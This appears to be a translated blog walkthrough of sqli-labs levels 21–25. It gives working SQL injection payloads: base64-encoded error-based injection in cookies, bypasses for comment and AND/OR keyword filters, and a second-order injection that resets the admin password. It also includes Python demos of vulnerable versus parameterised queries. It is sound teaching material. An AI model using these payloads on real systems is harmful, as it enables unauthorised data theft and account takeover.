
SQL lab 21~25 summary (subsequent continuous update) (including secondary injection explanation)

2022-07-07 12:24:00 hcjtn

Level 21

Entering admin seems to make no difference.

Let's capture the level 21 request (screenshot omitted):

We find that the cookie has changed: it is no longer admin as in the previous level, but a string of seemingly random characters.

That is because admin has been base64-encoded:

$cookee = base64_decode($cookee);

Decoding it once (screenshot omitted):

gives admin.

The rest is the same as level 20; we just convert the payload to base64.

Take: admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- q

which becomes: YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIC0tIHEKCg==

Result (screenshot omitted):

Because -- q is easy to get wrong during the conversion, we switch to another way of neutralising the rest of the statement: and '1'='1.

Let's analyse the source code:

$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"

Now inject the statement:

$sql="SELECT * FROM users WHERE username=(' 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1') LIMIT 0,1"

Observe that the closing single quote of '$cookee' combines with and '1'='1, so that the updatexml clause is executed.

Therefore:

  • Query the database name: admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

  • Query the table names: admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) and '1'='1

  • Query the column names: admin 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and '1'='1

  • Query the data: admin 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and '1'='1

Level 22

Look at the source code:

$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

We see that the value is wrapped in double quotes.

Everything else is the same as level 21:

  • Query the database name: admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1

  • Query the table names: admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) and "1"="1

  • Query the column names: admin "and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and "1"="1

  • Query the data: admin "and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and "1"="1

Level 23

This level takes a familiar GET parameter.

Input: ?id=1' and 1=2 -- q

Result (screenshot omitted):

The comment does not take effect here.

Looking at the source code we find:

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

preg_replace is PHP's regular-expression replacement function (with the /e modifier it could even evaluate the replacement as code, which is how it was once used for template compilation; here it is plain string replacement). In this source, any # or -- in the input is replaced with an empty string.

And because of:

else 
	{
    
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}

error-based injection can be used (screenshot omitted):

e.g. ?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)or '1'='1

Level 24

This level requires second-order injection:

Second-order injection: malicious data constructed by the attacker is first stored in the database; later it is read back and placed into an SQL statement, which causes the injection.

Second-order injection has two steps:

  1. Inserting the malicious data:

    • When the data is first inserted into the database, only special characters are escaped; the original value is preserved when written, but the value itself carries malicious content.
  2. Reusing the malicious data:

    • Once the data is in the database, developers treat it as trustworthy. The next time it is needed it is read straight out of the database without further checking or sanitising, which causes the second SQL injection.

For level 24 we register an account named admin'# and then log in.

Let's first look at the source code:

<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
    
	if (!isset($_SESSION["username"])) 
	{
    
   		header('Location: index.php');
	}
	header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");



if (isset($_POST['submit']))
{
    
	
	
	# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{
    	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
    
			echo "Password successfully updated";
	
		}
		else
		{
    
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}
	else
	{
    
		echo '<font size="5" color="#FFFF00"><center>';
		echo "Make sure New Password and Retype Password fields have same value";
		header('refresh:2, url=index.php');
	}
}
?>
<?php
if(isset($_POST['submit1']))
{
    
	session_destroy();
	setcookie('Auth', 1 , time()-3600);
	header ('Location: index.php');
}
?>
</center>  
</body>
</html>
The key part is:

	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

We find a new function:

    mysql_real_escape_string   

mysql_real_escape_string() escapes the special characters in a string so it can be used in an SQL statement.

The following characters are affected:

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a

On success the function returns the escaped string; on failure it returns false.

Tip: this function is used to guard against database attacks (SQL injection).

So in the source above only username does not pass through this function, and therefore only username can be used for SQL injection.

Substituting admin'# gives:

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";

We see that the ' in admin'# closes the preceding username=' and the # comments out the rest of the statement;

that is, if we change the password while logged in as admin'# (with $pass==$re_pass),

the following statement is executed:

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";

which changes admin's password.
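As an added example (not code from sqli-labs or from the author), here is the level 24 flow reproduced in Python against an in-memory SQLite database, with the vulnerable password change beside a hardened one that binds every value, including the session username. The table, the escape() helper and the account names are constructed stand-ins; SQLite only understands "-- " as a line comment, so the registered name is admin'-- where the page uses admin'#, but the mechanism is identical.

```python
import sqlite3

# Constructed stand-in for mysql_real_escape_string (SQLite style: doubles quotes).
def escape(value):
    return value.replace("'", "''")


def setup():
    # Constructed schema: one pre-existing admin account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'admin-secret')")
    return db


def register(db, username, password):
    # Step 1 of the page: the insert itself is safe (parameterised), but the
    # stored value still carries the quote and comment characters verbatim.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(db, session_user, current, new):
    # Step 2: mirrors the level 24 UPDATE. Passwords are escaped, but the
    # username read back from the session is trusted and concatenated raw.
    sql = (f"UPDATE users SET password='{escape(new)}' "
           f"WHERE username='{session_user}' AND password='{escape(current)}'")
    return db.execute(sql).rowcount  # rows actually updated


def change_password_fixed(db, session_user, current, new):
    # Hardened form: every value is bound, so the stored quote stays data.
    return db.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new, session_user, current)).rowcount


def password_of(db, username):
    return db.execute("SELECT password FROM users WHERE username=?",
                      (username,)).fetchone()[0]


def demo(change_password):
    """Register the crafted account, 'log in' as it, attempt a password change
    with a wrong current password, and report admin's resulting password."""
    db = setup()
    register(db, "admin'-- ", "whatever")
    change_password(db, "admin'-- ", "wrong-current", "pwned")
    return password_of(db, "admin")
```

With the vulnerable function the WHERE clause collapses to username='admin' and the real admin's password is overwritten without knowing the current one; with the fixed function zero rows change.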

Level 25

Looking at the source code we find:

function blacklist($id)
{
    
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

If the input contains the keyword and or or, preg_replace replaces it with the empty string:

/or/i

The i flag means case-insensitive, so both and and AND are replaced (likewise for or).

So we can use MySQL's symbolic logical operators instead (&& for and, || for or):

?id=1' && 1=1 -- q

Note: in a URL, & separates parameters,

so && must be URL-encoded (%26%26).

So in the URL bar we enter: ?id=1' %26%26 1=2-- q

Continuing through the source code:

else 
	{
    
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  

So union queries cannot be used, but error-based injection can.

But when we then enter ?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- q

we get (screenshot omitted):

In the error message we see that information has become infmation: the or was removed by the function.

So we write information as infoorrmation, which the replacement turns back into information,

and then error-based injection works.
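As an added example (not the sqli-labs code), a Python stand-in for the level 25 blacklist() shows why a single deletion pass lets infoorrmation through, and that repeating the pass until the input stops changing closes that gap but still leaves the && / || substitution untouched, which is why a keyword blacklist is not an adequate control on its own.

```python
import re


def blacklist_single_pass(value):
    # Mirrors the page's two preg_replace calls: one case-insensitive pass each
    # that deletes "or" and then "and".
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)
    return value


def blacklist_until_stable(value):
    # Repeat the same rules until nothing changes, so a keyword re-formed by a
    # deletion (infoorrmation -> information) is removed on the next round.
    while True:
        stripped = blacklist_single_pass(value)
        if stripped == value:
            return value
        value = stripped


def survives_filter(value, filter_fn):
    # True when the filter leaves the input exactly as submitted.
    return filter_fn(value) == value
```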

Original site

Copyright notice
This article was written by [hcjtn]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202130618271716.html